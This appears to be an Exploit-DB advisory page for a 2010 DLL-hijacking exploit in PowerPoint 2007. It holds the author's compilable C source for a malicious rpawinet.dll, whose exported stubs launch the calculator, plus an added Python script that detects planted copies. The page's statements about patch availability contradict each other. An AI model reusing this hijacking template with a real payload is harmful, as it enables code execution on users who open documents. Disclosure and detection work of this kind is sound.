Vendor: Microsoft Office PowerPoint 2007
By: storm
CVSS: 7.5 (HIGH)
CWE: DLL Hijacking, DLL Injection
Product Name: Microsoft Office PowerPoint 2007
Affected Version From: 2007 (12.0.6535.5002) SP2
Affected Version To: 2007 (12.0.6535.5002) SP2
Patch Exists: NO
Platforms Tested: Windows Vista SP2
2010

Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll)

This exploit hijacks a DLL used by Microsoft Office PowerPoint 2007, specifically rpawinet.dll. When a malicious PowerPoint file is opened (.odp, .pothtml, .potm, .potx, .ppa, .ppam, .pps, .ppt, .ppthtml, .pptm, .pptxml, .pwz, .sldm, .sldx, and .thmx files are affected), the attacker can execute arbitrary code; in this proof of concept the code launches the calculator.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Microsoft Office PowerPoint 2007 or apply the necessary security patches. It is also advised to exercise caution when opening PowerPoint files from untrusted sources.
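
A defensive sweep for this issue, as an added example that is not part of the original advisory or the author's code: it walks a directory tree and reports any rpawinet.dll sitting beside a file of an affected type. It assumes the usual DLL-hijacking layout, where the planted DLL is placed in the same folder as the document; the function and constant names are hypothetical.

```python
import os
import sys

# Extensions the advisory lists as affected.
AFFECTED_EXTS = {
    ".odp", ".pothtml", ".potm", ".potx", ".ppa", ".ppam", ".pps", ".ppt",
    ".ppthtml", ".pptm", ".pptxml", ".pwz", ".sldm", ".sldx", ".thmx",
}
# DLL name from the advisory title; Windows file names are case-insensitive,
# so all comparisons are done on lower-cased names.
PLANTED_DLL = "rpawinet.dll"


def find_planted_dlls(root):
    """Return a sorted list of (dll_path, [document names]) for every
    directory under root where rpawinet.dll sits beside an affected file.

    Assumption (not stated on the page): the DLL is planted in the same
    folder as the document that is opened.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        dlls = [f for f in filenames if f.lower() == PLANTED_DLL]
        if not dlls:
            continue
        docs = sorted(
            f for f in filenames
            if os.path.splitext(f)[1].lower() in AFFECTED_EXTS
        )
        # A DLL with no affected document next to it is not reported.
        if docs:
            for dll in dlls:
                findings.append((os.path.join(dirpath, dll), docs))
    return sorted(findings)


if __name__ == "__main__":
    # Usage: python sweep.py <share-or-download-folder>
    start = sys.argv[1] if len(sys.argv) > 1 else "."
    for dll_path, docs in find_planted_dlls(start):
        print(f"SUSPICIOUS {dll_path} beside {', '.join(docs)}")
```

Run it against network shares, download folders and extracted archives, which are the places where a document and a DLL can arrive together.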
Source

Exploit-DB raw data:

/*

Exploit Title: Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Version: 2007 (12.0.6535.5002) SP2
Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o rpawinet.dll PowerPoint-DLL.c

.odp, .pothtml, .potm, .potx, .ppa, .ppam, .pps, .ppt, .ppthtml, .pptm, .pptxml, .pwz, .sldm, .sldx, and .thmx files are affected.

*/

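#include <windows.h>
#include <stdlib.h>   /* exit() */
#define DllExport __declspec (dllexport)

/* Declared before use; every exported stub below calls it. */
int hax(void);

/* Exported names; each one forwards to hax(). */
DllExport void HttpFilterBeginningTransaction() { hax(); }
DllExport void HttpFilterClose() { hax(); }
DllExport void HttpFilterOnBlockingOps() { hax(); }
DllExport void HttpFilterOnResponse() { hax(); }
DllExport void HttpFilterOnTransactionComplete() { hax(); }
DllExport void HttpFilterOpen() { hax(); }

/* Proof-of-concept payload: launches the calculator, then ends the host process. */
int hax(void)
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}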